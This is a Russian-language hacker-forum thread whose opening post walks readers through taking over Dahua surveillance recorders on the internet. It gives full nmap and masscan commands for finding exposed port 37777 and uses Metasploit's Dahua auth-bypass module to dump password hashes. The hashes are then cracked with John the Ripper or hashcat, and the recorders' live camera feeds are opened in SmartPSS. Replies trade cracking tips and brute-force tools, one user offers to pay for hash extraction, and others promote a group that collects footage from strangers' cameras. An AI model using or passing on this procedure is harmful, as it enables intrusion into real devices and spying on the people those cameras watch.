|
Приветствую обиталей Ачата.
Давно я не писал годноты.... почитал форум и понял что нужно что то толковое двинуть. Сегодня я вам поведаю как подчинить под свой контроль регистраторы фирмы DAHUA. Для начала нам нужны след. иснтрументы. + nmap + metasploit + john the ripper + Dahua SmartPSS (скачать можно с офф.сайта) Сначала нам нужно найти собственно сами регистраторы в вебе. Если вы хоть раз настраивали регистратор то знаете что для корректной работы, нужно пробрасывать порт 37777 и 80. 80 порт необходим для просмотра виедфайлов\архива с помощью браузера (так как 80 порт используется для настройки роутера, часто его меняют на 8080,1080, или 81) 37777 порт для проприетарного софта. Итак искать мы будем открытый порт 37777 (потом обьясню почему не 80 и 8080) Итак запускаем nmap\masscan для поиска. команда для нмапа следующая: root@kali:nmap -n -Pn -T4 -sS -p37777 --open 192.168.1.0/24 -oG 37777_open.txt если у вас есть список ИПов в стандарте CIRD если по религиозным убеждениям используете масскан тогда печатайте так... root@kali:masscan --rate=500 -p37777 192.168.1.0/24 -oG 37777.txt можно сканировать из внешнего файла root@kali: nmap -n -Pn -T4 -sS -p37777 --open -iL /home/file.txt -oG 37777_open.txt для масскана аналогично root@kali: masscan --rate=500 -p37777 -iL /home/file.txt -oG 37777.txt После скана нужно "почистить" файлы, оставить только голые ИПы иначе метасплойт пошлёт на йух. root@kali:cat 37777.txt | sort | uniq > 37777_clear.txt Окей... мы насканили допустим 30-40 регистраторов, запускаем метасплойт. root@kali:service postgresql start root@kali:msfconsole root@kali: use auxiliary/scanner/misc/dahua_dvr_auth_bypass дальше сканер нужно настроить.... root@kali: set ACTION USER root@kali: set THREADS 25 теперь маленькая хитрость, что бы не вбивать ипы вручную просто скормим весь файл метайслойт через спец.строку root@kali: set RHOSTS file:37777_clear.txt ждём.... После того как сканер закончил свою работу, копируем лут и сохраняем в тесктовый файл. Мы получили логины и пароли в зашифрованом виде ( не переживайте крипт там очень простой "Dahua [MD5 32/64]" ) (Однако недавно обратил внимание что DAHUA начала использовать хэш MD5, если таковой появится в выводе метасплойт то его возможно сбрутить через кота) root@kali:hashcat -m 0 -a 0 hash.txt -o cracked.txt /home/wordlist.txt Копируем хэши в отдельный файл и готовим для брута Джоном, для кота я не нашел подержки. допустим наш хэш "4WzwxXxm" нужно добавить перед ним префикс $dahua$, хэш будет иметь вид $dahua$4WzwxXxm и скармливаем Джону. root@kali: john hash.txt Если пароль не сложный то он быстро найдётся (по собственному опыту на регистраторе минимум 2-4 учётки а то и больше и взламывается сразу почти все) После удачного брута проверяем пароли... root@kali: john hash.txt --show После того как мы подобрали пасс можно поступить двумя способами... Просканить данный ИП на наличие проброшеного порта регистратора (если таковой имеется) и зайти через ВЕБ или ... Если есть WIN под рукой установить оригинальный софт от производителя DAHUA PSS. сцыль "http://ru.dahuasecurity.com/ru/download_2.html" я скачивал версию "Smart_PSS_International_IS_V2.00.1.R.20170225 " Устанавливаем софт, во время первого запуска он потребует установить пароль... указываем любой... 1234 \ 0000 не важно. (просто в качестве меры безопасности) Ставим галку сохранить пароль и больше он запрашивается не будет. https://cdn1.savepice.ru/uploads/201...96b25-prev.jpg https://cdn1.savepice.ru/uploads/201...10370-prev.jpg Далее идём во вкладку HOME PAGE -> DEVICES https://cdn1.savepice.ru/uploads/201...c33e5-prev.jpg Жмём ADD, и указываем необходимые данные и жмём еще раз ADD. https://cdn1.savepice.ru/uploads/201...90f65-prev.jpg Переходим обратно в главное меню, выбираем LIVEVIEV и раскрываем список камер справа... https://cdn1.savepice.ru/uploads/201...ab7b2-prev.jpg Бонусом запилил видосик на скорую руку... https://yadi.sk/i/9E8pg8Iq3VPM6T |
Цитата:
|
Было бы здорово, если бы подсказали какие-нибудь онлайн-сервисы по расшифровки паролей к камерам дахуа вида $dahua$y11Ko7d0. На компе с кали уже 3 неделю john брутит около 100 паролей и около 70 - без результата.
|
Цитата:
|
Можно по действиям про burpsuite(если со скриншотами - вообще бы круто было иили коротенькое видео)? На примере 69.138.119.231. Запустил burpsuite, дальше куда что?
Может глупый вопрос, но в инете про такую реализацию инфы не нашел. |
Цитата:
|
Благодарю за ссылочку, но там очень коротко и не совсем понятен сам процесс(особенно через переводчик). Поэтому прошу описать процесс по шагам с фото или краткий видео-ролик(как для чайника), чтобы иметь понимание того, что делаешь и почему.
|
Это ты отсюда пришел ???
|
Нет, читал статью, увидел коммент с поправкой про мд5, решил спросить.
|
ребят кто может вытащит хеш файл с конкретного двр к которому имеется доступ только через вай фай напишите заплачу за обучение
|
Цитата:
|
Цитата:
|
Dahua работают (по дефолту) на 37777.
Умные переделывают порты, чтобы не забывать - 27777 или 47777. Для работы достаточно nmap (или RouterScan), MSF, John. Не работает с камерами (Stand-alone), вскрываются, по опыту 17 из 20. |
на 81м порту может работать какой угодно регистратор
Чаще всего встречаются парни XiongMai, TVT, Shenzhen И там механизм получения доступа совсем иной |
парню надо был софт и уроки. он их получил от группы Asleep - Гайдs для самых начинающих по DVR камерам
|
Цитата:
|
Цитата:
|
Цитата:
Камеры – как миллионы закрытых окон. Они ждут своего наблюдателя, случайного прохожего, заглянувшего без приглашения. Здесь мы собираем странные, интересные и красивые находки с камер по всему миру. Зафиксированный момент времени. Эстетика. Красота в глазах смотрящего. Гайды по поиску и получению доступа к камерам. Софт для изучения Полезные ссылки СОФТ ДЛЯ ИЗУЧЕНИЯ Программа для просмотра DVR/NVR: smartPSS: iOS/Android – iDMSS, gDMSS Dahua_Brute_Pass++ SWC(Dahua)python SWC(Dahua)v1.2_hacked_dua HikBrute XiongMai Asleep Scanner NESCA 1. Гайд для самых начинающих по DVR камерам на 37777. 37777_gayd Скачать 2. Частично автоматизированный поиск камер Dahua с помощью сканера NESCA. NESCA37777BСкачать 3. Краткий справочник по разным камерам. guide0_2_4Скачать 4. Расширенное руководство по камерам. camsguide0_3_1Скачать Один человек собрал все что есть в открытом доступе. Что тебе надо было??? |
Цитата:
|
Но ссылки нет можешь дать ссылки на скачивания
|
Цитата:
|
Цитата:
|
На последнем этапе, когда создал файл с хешами, запускаю john и в процессе выдает:
.SpoilerTarget" type="button">Spoiler https://i.ibb.co/QYYxwMZ/Screenshot-2020-02-27.png upd: дошло))) |
а если порт не 37777, а, например, 27777,47777 как быть? я все порты в один лист положил и в итоге эксплоит на пол пути повис.
|
Привет всем. Вижу тема уже старая. Подскажите что я не так делаю? Где хеши?
https://i.postimg.cc/zfS18wd4/1234.png |
В ипах небыло уязвимых устройств.
|
Сейчас наверное это моя тема только я на bhf (https://bhf.im/threads/597423/page-270), если интересно что и как делаю, как бручу хэши и т.д. и за годнотой писать в ЛС
А если в кратце то вот мой пост там https://bhf.im/threads/597423/page-247#post-7219516 И дальше https://bhf.im/threads/597423/page-267 (AlinkaColinka242ибо два раза забыл пароль от предыдущих акков из-за слета firefox-а из за "FastStone Image Viewer" что б ему *****) |
| Время: 00:50 |